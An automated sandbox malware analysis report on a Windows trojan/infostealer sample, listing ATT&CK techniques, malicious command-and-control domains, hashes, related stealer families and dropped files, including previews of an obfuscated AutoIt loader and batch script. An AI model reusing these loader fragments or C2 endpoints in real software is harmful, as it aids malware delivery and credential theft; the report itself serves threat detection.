Email Addresses	DNS Server	Domain Accounts	1 PowerShell	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	23 File and Directory Discovery	SMB/Windows Admin Shares	121 Input Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	37 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	11 Masquerading	LSA Secrets	221 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
80441fcf.exe	100%	Avira	BDS/Agent.pjroe

Source	Detection	Scanner	Label
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
https://assumptionflattyou.shop/os	0%	Avira URL Cloud	safe
pooreveningfuseor.pw	0%	Avira URL Cloud	safe
technologyenterdo.shop	100%	Avira URL Cloud	malware
edurestunningcrackyow.fun	0%	Avira URL Cloud	safe
problemregardybuiwo.fun	0%	Avira URL Cloud	safe
https://assumptionflattyou.shop/4	0%	Avira URL Cloud	safe
https://assumptionflattyou.shop/api	100%	Avira URL Cloud	malware
associationokeo.shop	100%	Avira URL Cloud	malware
turkeyunlikelyofw.shop	100%	Avira URL Cloud	malware
http://www.autoitscript.com/autoit3/X	0%	Avira URL Cloud	safe
https://assumptionflattyou.shop/apis	0%	Avira URL Cloud	safe
https://www.autoitscript.com/autoit3/	0%	Avira URL Cloud	safe
detectordiscusser.shop	100%	Avira URL Cloud	malware
https://assumptionflattyou.shop/apiy	0%	Avira URL Cloud	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
lighterepisodeheighte.fun	0%	Avira URL Cloud	safe
https://assumptionflattyou.shop/Pa	0%	Avira URL Cloud	safe
https://assumptionflattyou.shop/	0%	Avira URL Cloud	safe
assumptionflattyou.shop	0%	Avira URL Cloud	safe
https://assumptionflattyou.shop:443/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
assumptionflattyou.shop	172.67.163.54	true	true	unknown
qBnWsPFfTrJBhDSbGyd.qBnWsPFfTrJBhDSbGyd	unknown	unknown	false	unknown
198.187.3.20.in-addr.arpa	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
edurestunningcrackyow.fun	true	Avira URL Cloud: safe	unknown
problemregardybuiwo.fun	true	Avira URL Cloud: safe	unknown
technologyenterdo.shop	true	Avira URL Cloud: malware	unknown
pooreveningfuseor.pw	true	Avira URL Cloud: safe	unknown
associationokeo.shop	true	Avira URL Cloud: malware	unknown
https://assumptionflattyou.shop/api	false	Avira URL Cloud: malware	unknown
turkeyunlikelyofw.shop	true	Avira URL Cloud: malware	unknown
detectordiscusser.shop	true	Avira URL Cloud: malware	unknown
lighterepisodeheighte.fun	true	Avira URL Cloud: safe	unknown
assumptionflattyou.shop	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://assumptionflattyou.shop/apir	Apply.pif, 0000000C.00000002.2541881503.0000000004A8D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://assumptionflattyou.shop/os	Apply.pif, 0000000C.00000002.2541881503.0000000004A74000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assumptionflattyou.shop/4	Apply.pif, 0000000C.00000002.2540514677.0000000001620000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/X	Apply.pif, 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmp, Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	false	Avira URL Cloud: safe	unknown
https://assumptionflattyou.shop/apis	Apply.pif, 0000000C.00000002.2541881503.0000000004A8D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	false	Avira URL Cloud: safe	unknown
https://assumptionflattyou.shop/apiy	Apply.pif, 0000000C.00000002.2540514677.0000000001620000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assumptionflattyou.shop/Pa	Apply.pif, 0000000C.00000002.2541881503.0000000004A74000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assumptionflattyou.shop/	Apply.pif, 0000000C.00000002.2541881503.0000000004A74000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assumptionflattyou.shop:443/api	Apply.pif, 0000000C.00000002.2540514677.0000000001620000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.163.54	assumptionflattyou.shop	United States		13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1480529
Start date and time:	2024-07-24 21:03:42 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	80441fcf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/9@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 97 Number of non-executed functions: 278
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 40.126.32.72, 40.126.32.136, 40.126.32.134, 20.190.160.14, 40.126.32.138, 40.126.32.140, 40.126.32.68, 20.190.160.20
Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 80441fcf.exe

Simulations

Behavior and APIs

Time	Type	Description
15:05:14	API Interceptor	6x Sleep call for process: Apply.pif modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.163.54	https://assets-usa.mkt.dynamics.com/492791da-6fc7-ee11-9075-6045bd00390b/digitalassets/standaloneforms/35c1b077-37d2-ee11-9079-000d3a32e3b3	Get hash	malicious	HTMLPhisher	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://forms.office.com/r/kiNP3VZaGz	Get hash	malicious	Unknown	Browse	1.1.1.1
	7Y18r(97).exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	7Y18r(69).exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	http://id.cemgage.com	Get hash	malicious	Unknown	Browse	104.16.141.114
	https://sourceconnect.bigreport.com/verify?token=qRTJWwwWaHLZrsa2ALkGE2xQJBJOUj7L	Get hash	malicious	Unknown	Browse	104.18.35.133
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	188.114.96.3
	Fd_HR24 Jul, 2024.pdf	Get hash	malicious	Phisher	Browse	172.64.41.3
	7Y18r(114).exe	Get hash	malicious	Unknown	Browse	104.16.185.241
	7Y18r(114).exe	Get hash	malicious	Unknown	Browse	104.16.185.241
	Restortion.clinic.exe	Get hash	malicious	Empyrean, Discord Token Stealer	Browse	104.16.124.96

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	7Y18r(97).exe	Get hash	malicious	LummaC	Browse	172.67.163.54
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	172.67.163.54
	7Y18r(111).exe	Get hash	malicious	Unknown	Browse	172.67.163.54
	7Y18r(111).exe	Get hash	malicious	Unknown	Browse	172.67.163.54
	XEV5ucEWu7.exe	Get hash	malicious	Unknown	Browse	172.67.163.54
	611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe	Get hash	malicious	Bdaejec, PrivateLoader	Browse	172.67.163.54
	qGJBgGtR7e.exe	Get hash	malicious	Gh0stCringe, GhostRat, Mimikatz, RunningRAT	Browse	172.67.163.54
	VaajyQsbTV.exe	Get hash	malicious	GhostRat, Nitol	Browse	172.67.163.54
	PXTCFXKM.exe	Get hash	malicious	LummaC	Browse	172.67.163.54
	RQTMGXIK.msi	Get hash	malicious	LummaC	Browse	172.67.163.54

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Cookbook	ekDMpiTYbC.exe	Get hash	malicious	RedLine	Browse
	last.hta	Get hash	malicious	AsyncRAT	Browse
	TierDiagnosis.exe	Get hash	malicious	AsyncRAT	Browse
	file.exe	Get hash	malicious	RedLine	Browse
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	7d69f17f.exe	Get hash	malicious	RedLine	Browse
	Filezillawin_94199_patched.exe	Get hash	malicious	Unknown	Browse
	Filezillawin_94199_patched.exe	Get hash	malicious	Unknown	Browse
	4spS4Frgbl.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	4spS4Frgbl.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	RiKuOxbSRz.exe	Get hash	malicious	RHADAMANTHYS	Browse
	1FspNrPaFJ.exe	Get hash	malicious	Unknown	Browse
	1FspNrPaFJ.exe	Get hash	malicious	Unknown	Browse
	installation.exe	Get hash	malicious	RHADAMANTHYS	Browse
	install.pdf.lnk	Get hash	malicious	RHADAMANTHYS	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	946784
Entropy (8bit):	6.628560786473655
Encrypted:	false
SSDEEP:	24576:LOo8pEnK4mrqlEZuVZ2HOI+X0l1lMZyYFaeBmyF:LF8p4KpqlEZeXI+X0TVcae3F
MD5:	848164D084384C49937F99D5B894253E
SHA1:	3055EF803EEEC4F175EBF120F94125717EE12444
SHA-256:	F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
SHA-512:	AABE1CF076F48F32542F49A92E4CA9F054B31D5A9949119991B897B9489FE775D8009896408BA49AC43EC431C87C0D385DAEAD9DBBDE7EF6309B0C97BBAF852A
Malicious:	true
Joe Sandbox View:	Filename: 7d69f17f.exe, Detection: malicious, Browse Filename: Filezillawin_94199_patched.exe, Detection: malicious, Browse Filename: Filezillawin_94199_patched.exe, Detection: malicious, Browse Filename: 4spS4Frgbl.exe, Detection: malicious, Browse Filename: 4spS4Frgbl.exe, Detection: malicious, Browse Filename: RiKuOxbSRz.exe, Detection: malicious, Browse Filename: 1FspNrPaFJ.exe, Detection: malicious, Browse Filename: 1FspNrPaFJ.exe, Detection: malicious, Browse Filename: installation.exe, Detection: malicious, Browse Filename: install.pdf.lnk, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...\|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\o

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (939), with CRLF line terminators
Category:	dropped
Size (bytes):	717936
Entropy (8bit):	5.358908701155791
Encrypted:	false
SSDEEP:	6144:btJQJF1QKRpG++eJ+yTGsfvrKS1TTxIxyCnblLs8tDsAntFiGAsY6WzYRi84XVNC:IXvaMwDdHRi8qNrQKsnObl8ocwI/
MD5:	BAA1587C7EFFD1D982A3CFE987D0F4A2
SHA1:	EDF879652A193AC9F685A44FC8FF39DA7571F803
SHA-256:	E4160779100599C8404FD1153F0AF398DF82C8A78CE0AE98E53FDCEFDFCAD60F
SHA-512:	68D8FDD4877AC7D97A238AD9FE2F91160BF71EA54CBB62BEBE56DBFB00DCFE88D6291B9188FF6500CAFF28BD3B4518F4697E30227279F6059324E6756A995EA4
Malicious:	false
Preview:	Func LatinaDrawHappyDk($PastaHivViolin, $rodskilledburden)..$PuttingNasty = @AutoItX64..If $PuttingNasty Then..Local $BlankStudyInjury = electronxp("53]125]61]62]72]53]58]58]57]61]61]62]72]61]57]61]61]62]73]58]57]62]61]62]72]70]57]58]56]54]72]62]58]60]58]59]58]56]57]61]61]56]74]72]53]61]72]60]53]54]53]53]53]53]53]53]53]53]72]60]57]54]53]57]53]53]53]53]53]53]53]53]57]58]61]61]57]70]53]61]57]54]61]56]72]54]53]54]57]62]61]56]72]55]53]54]57]54]61]54]75]62]53]53]53]54]53]53]53]53]60]58]74]71]57]61]61]73]71]62]53]53]53]54]53]53]53]53]57]58]56]54]73]55]59]59]57]58]56]54]72]62]74]71]56]59]57]54]71]70]53]54]53]53]53]53]53]53]56]54]75]59]53]75]71]59]58]61]53]61]53]75]71]59]54]57]55]74]61]73]56]57]54]56]57]59]61]73]53]72]53]74]57]58]53]75]71]59]72]62]57]73]59]56]73]62]57]55]53]75]71]59]60]57]54]62]53]61]57]53]61]61]60]53]53]61]57]61]61]56]72]53]53]54]57]55]61]61]58]72]54]62]53]61]57]61]56]62]75]61]60]57]53]74]57]58]56]62]73]53]60]74]72]58]57]62]59]56]75]55]57]54",30/6)..$BlankStudyInjury &= elect

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Affordable

Download File

Process:	C:\Users\user\Desktop\80441fcf.exe
File Type:	data
Category:	dropped
Size (bytes):	146016
Entropy (8bit):	5.991963512177502
Encrypted:	false
SSDEEP:	3072:66jKj+wsxjgarB3RZgDWy4ZNogXJ3i2Umb2Oq:664EgarxUaBZ2myoG
MD5:	E66C8890C2EB6ADBA5948D082BD215A6
SHA1:	93A813794B38B728C8A6248C64221A419B026CE4
SHA-256:	99E62C44A3DBF370201324564C94BE16FFB81B29C543EC5FD6F14E1A3BE75E1A
SHA-512:	9B7546CEE1BA82FF4DB0A3598098BE91BBD114E4A80116B15AC9EA106FA881B201EEE6DDA4EE91B2D917ECAAB5BC2327DCD34047C60F122F6E0FDACB79E49D17
Malicious:	false
Preview:	rward reference offset.internal error: unexpected repeat.unrecognized character after (? or (?-.POSIX named classes are supported only within a class.missing ).reference to non-existent subpattern.erroffset passed as NULL.unknown option bit(s) set.missing ) after comment.parentheses nested too deeply.regular expression is too large.failed to get memory.unmatched parentheses.internal error: code overflow.unrecognized character after (?<.lookbehind assertion is not fixed length.malformed number or name after (?(.conditional group contains more than two branches.assertion expected after (?( or (?(?C).(?R or (?[+-]digits must be followed by ).unknown POSIX class name.POSIX collating elements are not supported.this version of PCRE is compiled without UTF support.spare error.character value in \x{} or \o{} is too large.invalid condition (?(0).\C not allowed in lookbehind assertion.PCRE does not support \L, \l, \N{name}, \U, or \u.number after (?C is > 255.closing ) for (?C expected.recursive

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Cookbook

Download File

Process:	C:\Users\user\Desktop\80441fcf.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	218112
Entropy (8bit):	6.538289120139155
Encrypted:	false
SSDEEP:	6144:LQBk7JjX74cN0lrztgwU0Wyw3mFygyE4m:LO0z8e0lvSr0Wyw20K4m
MD5:	E9DB611974409FB7C1770FE95BFD5402
SHA1:	AD077D6F8AD48BD4A8EDBCA88711CC4B7C71C1B5
SHA-256:	FC141FFE6BF256B8794C769FEED25FA8BFEFF01A60CDD2699E2D84E94585553C
SHA-512:	623694FDCC7ACD66ED8170A158D2209706311566E04629C5A03B133902F729A554C3AAA6C85EF1163EDAA3DFAFD72D85B49F6EDFA73E5419E57FAC1D2F489799
Malicious:	false
Joe Sandbox View:	Filename: ekDMpiTYbC.exe, Detection: malicious, Browse Filename: last.hta, Detection: malicious, Browse Filename: TierDiagnosis.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...\|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Increasingly

Download File

Process:	C:\Users\user\Desktop\80441fcf.exe
File Type:	data
Category:	dropped
Size (bytes):	295936
Entropy (8bit):	6.717953006560187
Encrypted:	false
SSDEEP:	6144:fqd12lqlEAehuqN8zwNzlmhPL1b5nZ2tZ6lfA6Gfm608DsvqJX4xNn:fqClqlEZuB1b5Z2tZ6XKmNvqJWNn
MD5:	863CE19B37F186C47A26882E399B9A81
SHA1:	3843EDED5FDD895E41694174D79789854BCCADA5
SHA-256:	0DBCC3E2CCFD18644F4EC3A24058CF6109E520B0C2213D8A083B5200696D20C6
SHA-512:	CA5323396012958B0269F4F0C1AF62C0B26F593D061D81755060873DC270AA8680D4F61B00A445FC123D406D6F0E06FC1F7D45BC54C1EFDC757B7E3531199F33
Malicious:	false
Preview:	...]..U..W.u..\|..Y.M....I....u..B..........E.j.Y...............E..@......t........".....E..@...t(.E..`...E..@.......E.t..H....E.j.Y....!..E.Sj.[.......E.j.Y....!..E..`...E..@......u3V.u.j..3..Y;.t..u.S.3..Y;.u.W.....Y..u..u..-...Y^.u..].S.3...YY..u..E.j.Y..............[_]..U..W.u..{..Y.M....I....u!.1..........E.j.Y.................E..@......t........".....E..@...t(.E..`...E..@.......E.t..H....E.j.Y....!..E.SVj.[.......E.j.Y....!..E..`...E..@......u1.u.j..2..Y;.t..u.S.2..Y;.u.W.....Y..u..u......Y.u..u.V.....YY..u..E.j.Y................^[_]..U..VW.u..kz..Y.M...I...........M.3..A..1+.@...E..H.I.H...~&.E.V.p.R..........E..H..E...3.;.....d...t....t.....?...k.0.....M......L..@( t.j.WWR.4..#......u..E.j.Y..........j..E.PR.$......H....@_^]..U..VW.u..y..Y.M...I...........M.3..A..1+.......E..H.....H...~(.E.V.p.R...........E..H.f.E.f..3.;.....f...t....t.....?...k.0.....M......L..@( t.j.WWR..3..#......u..E.j.Y..........j..E.PR.R.............@_^]..U..]./.....U..].5...j.hX.L.

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ink

Download File

Process:	C:\Users\user\Desktop\80441fcf.exe
File Type:	ASCII text, with very long lines (939), with CRLF line terminators
Category:	dropped
Size (bytes):	717936
Entropy (8bit):	5.358908701155791
Encrypted:	false
SSDEEP:	6144:btJQJF1QKRpG++eJ+yTGsfvrKS1TTxIxyCnblLs8tDsAntFiGAsY6WzYRi84XVNC:IXvaMwDdHRi8qNrQKsnObl8ocwI/
MD5:	BAA1587C7EFFD1D982A3CFE987D0F4A2
SHA1:	EDF879652A193AC9F685A44FC8FF39DA7571F803
SHA-256:	E4160779100599C8404FD1153F0AF398DF82C8A78CE0AE98E53FDCEFDFCAD60F
SHA-512:	68D8FDD4877AC7D97A238AD9FE2F91160BF71EA54CBB62BEBE56DBFB00DCFE88D6291B9188FF6500CAFF28BD3B4518F4697E30227279F6059324E6756A995EA4
Malicious:	false
Preview:	Func LatinaDrawHappyDk($PastaHivViolin, $rodskilledburden)..$PuttingNasty = @AutoItX64..If $PuttingNasty Then..Local $BlankStudyInjury = electronxp("53]125]61]62]72]53]58]58]57]61]61]62]72]61]57]61]61]62]73]58]57]62]61]62]72]70]57]58]56]54]72]62]58]60]58]59]58]56]57]61]61]56]74]72]53]61]72]60]53]54]53]53]53]53]53]53]53]53]72]60]57]54]53]57]53]53]53]53]53]53]53]53]57]58]61]61]57]70]53]61]57]54]61]56]72]54]53]54]57]62]61]56]72]55]53]54]57]54]61]54]75]62]53]53]53]54]53]53]53]53]60]58]74]71]57]61]61]73]71]62]53]53]53]54]53]53]53]53]57]58]56]54]73]55]59]59]57]58]56]54]72]62]74]71]56]59]57]54]71]70]53]54]53]53]53]53]53]53]56]54]75]59]53]75]71]59]58]61]53]61]53]75]71]59]54]57]55]74]61]73]56]57]54]56]57]59]61]73]53]72]53]74]57]58]53]75]71]59]72]62]57]73]59]56]73]62]57]55]53]75]71]59]60]57]54]62]53]61]57]53]61]61]60]53]53]61]57]61]61]56]72]53]53]54]57]55]61]61]58]72]54]62]53]61]57]61]56]62]75]61]60]57]53]74]57]58]56]62]73]53]60]74]72]58]57]62]59]56]75]55]57]54",30/6)..$BlankStudyInjury &= elect

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inventory

Download File

Process:	C:\Users\user\Desktop\80441fcf.exe
File Type:	ASCII text, with very long lines (1840), with CRLF line terminators
Category:	dropped
Size (bytes):	12562
Entropy (8bit):	5.805312300705228
Encrypted:	false
SSDEEP:	96:taFnFM5LjvgSc9uMkVh2sTkXnts9fJXRY2kSMM2bZIdrEKAAVBJYbfGguTakfdVE:MZF0vZJT6ntsH22T2Nltuw7Sd4jowNHf
MD5:	B649C8B485F6B192061AD04A185F03DC
SHA1:	6FB0CC214D6D55D400793C3D085D9EA98C7FBB87
SHA-256:	FEE25A6FCBD1D1BFBECA85E9A97E882D1B4A0BC5A521838F8B6EE1FE6C7370E9
SHA-512:	E12FDC7E64F6B2AD9EF45B01EC7AB87BB1DBA4C29E727517B9690018B2EC699BDD2173CF9EAC8A0F3441C32BA8A952AB8DE2B0BF63C6C47C94F56BA92BF2CBE3
Malicious:	false
Preview:	Set KiQOKZsoLEOrUiqMhwDWusbGrYTQGELUMbgNr=o..yGztGoqeXmjwfXwjaJpKMyABuS=sbThJbknfNhRnrVVsxCcXKlVrTy..ZuRXNgJEtjC=tmMmySLHQlpiEvWHhXpPa..npVfrpzsQtRY=bXKPkobgPWKzsses..rMkXqDDQOBgn=yfFymJCiXHUSJjkVM..sZJwyNzvxuZvGpPcRxOkRzOZyyd=sdaUeJXmKtlS..rgvoAwLrgcRiAqXkJVqvgytO=xXjdKNpVmOya..ErFeeUAMBIZhqolvbXpHeurmMD=HkqkSTRsWRjephaTgjeKEZm..QVKPnqyfmj=ABbizoRgEkVqzJhPjKTrHMYxXpe..WLXDWzRsRyJBNLURVUdyklSFFpj=CellyYaTharZSVYiqafWRumeS..Set HLSaXMirOOVncPawDCRdhfjLEhUfXvDosodHqVcdSOupjBXAD=v..XlBKsniNJSSyakNuhnLqH=AnnprnedzLiT..XQbYoTiLbqJNYmxJwSPVQK=jocILznuXmE..dPmCiAcenOctZHGaTaYQjMlQNk=sZTLgzJtTBfIcxHFbM..IrNuhFBOCDFJOVrr=EriKdDMQDKD..EiMtvCzESGyNEuAgSB=sdEqxEGamqdKUYzYvSFszKnl..XxuprnYeYktqiamQpTECWkPkotvhp=HSzevlApvCaHWMgXg..yBlRUIeMEUwZeKSFEjG=WgdqvwlggeW..PWiIoQXKqJFFov=HOsoedpDRlpxTnNnCXQl..DlvOgWyjILRq=CmXUUUFzdbYctjjkrHaj..Set rEUxNxtdonaxaVgAIeWFMhMnalJSqFrmNumVrm=q..AroZGwMdYLcFcHIQRve=KkfCcSGjvaboVvtIyNRdn..UflnrubIrGbEOgNFD=cAUFhjJYCqLrELtssZaXOAPNf..LsIPVmlrVXnfeXOtDvXqwLmvXO=FZULudv

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inventory.bat (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1840), with CRLF line terminators
Category:	dropped
Size (bytes):	12562
Entropy (8bit):	5.805312300705228
Encrypted:	false
SSDEEP:	96:taFnFM5LjvgSc9uMkVh2sTkXnts9fJXRY2kSMM2bZIdrEKAAVBJYbfGguTakfdVE:MZF0vZJT6ntsH22T2Nltuw7Sd4jowNHf
MD5:	B649C8B485F6B192061AD04A185F03DC
SHA1:	6FB0CC214D6D55D400793C3D085D9EA98C7FBB87
SHA-256:	FEE25A6FCBD1D1BFBECA85E9A97E882D1B4A0BC5A521838F8B6EE1FE6C7370E9
